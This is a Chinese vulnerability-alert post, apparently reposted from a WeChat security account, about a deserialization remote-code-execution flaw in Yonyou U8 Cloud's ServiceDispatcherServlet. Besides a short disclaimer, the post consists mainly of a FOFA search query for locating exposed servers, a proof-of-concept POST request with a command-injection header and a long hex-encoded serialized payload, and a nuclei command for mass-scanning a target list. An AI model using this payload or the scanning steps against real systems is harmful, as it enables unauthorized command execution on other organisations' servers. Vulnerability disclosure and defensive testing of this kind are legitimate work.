0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
用友U8 cloud servicedispatcher 存在反序列化rce漏洞。
0x03 漏洞复现
fofa-query: body="请下载新版UClient"
1.执行poc进行echo,得到结果
POST /ServiceDispatcherServlet HTTP/1.1Host:Cmd: {{rce}}User-Agent: Mozilla/5.0{{hex_decode("000039747271890176a5709d6c0244802063787e59bea348a7c04bbd6df6555e6803e56d4ee373cc6385ed048fc0875d7d1062a89b7da7a31509cea3324035c82167a78c1f78b1e836e9cc8987336c0501692fe52ac531f4275f9ce0bd2676445051802c927cd9d946ba1d0e5b0522a9fe05108c0417cb8ff41c8265ec1e7dc5ed2b84e2a6c3e6c2609237f8580feea613c277fd108e8020c212914e1a3f1d4bb27d05ae5410653dc410bebc333031b837e70e622b69f5ee166dccff07e8a984e85b85d18cdc5701c99a965ff1bf6941dd8994d3f5cbc30363f44d55bf41dafcfb7ad3c32e636447d87003f320e4869f78b7c1b1e192d2177878940168fd7a89333642ee7d1b1c78e52bc8bc2b913116d259ee45f8db2b8ca3acc33b4a59019c0178f2a37a76065c6d3688cf9167e03366c899fd94519607c65fa57ec2c1e20dae35a71a260e4da7ecf38a2984c0fc9b0e0a27fdfeaf781cea597ddb2975ea120fd69ebe5ef7919b0e03ee69a467eafe4439b1a9a850a0495656d30928c08a67369ef1bd59758b16586670e9c47c7fc8b3fc83adc8bd3da095edfb05d7519d54fc3cf820bd2f099ab06f3b33d8188b5f369ef1bd59758b16d0e0513f552bbd7cd1200394d79e46548ddd2697642d6db7045679aae853c017b7aa404c3e736a8ef8e46c4062c8527e99839de913894ca157f2a8d1cd78dec18583a9d54237f3b9242b24da5ab3c7608ddd2697642d6db7045679aae853c017b7aa404c3e736a8e643224308b78790c679126431f6855e41002acb23a318e292e3d2a28d7992a7b51cc2e6ccf9a12fd5a9bd08ddc539c4f16d6c9054aa959932da68b62395be13b33f4f83a243531bc271b992418f26e941d8662a43641800a6de83802098b641af902d6c4eae2cbefb199d53f3f053e01e85b85d18cdc5701c99a965ff1bf6941dd8994d3f5cbc3030bf85b971c4b58f36e14ac0b2119878a412e940fb6dc1e71efbffecb88b63239f964e5313e09c2fe7bfe0a91a5bd81a64844095b2594c96fcc28bf85fc1fd12e4aec76601acf43944103b21a7efa755ad1600d4272c1d00cea5270012b63bcf5c07f1e45903d5896c44faa67b6eeee27fb947c875974391c72647a6a07f57e3ecc28bf85fc1fd12e89f002a65393b658993c5e978c8e4e5fb0f3dc4873daf5ae3b43a917e0f0997f8439e013062dfef791999f1d4400f80382f201ca8f13dcbd5389c0aea2d482bfd99b02456640c22f775dba169a9075041a36419d5a84529062c86b67bac37b96de710039d7c688dc8419b970126e4b0d511d5b179d946c55ae41c83813d16c585ceede1e64720453b01dd
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t yongyou-cloud-servicedispatcher-rce.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞预警 用友U8 cloud servicedispatcher 反序列化rce漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论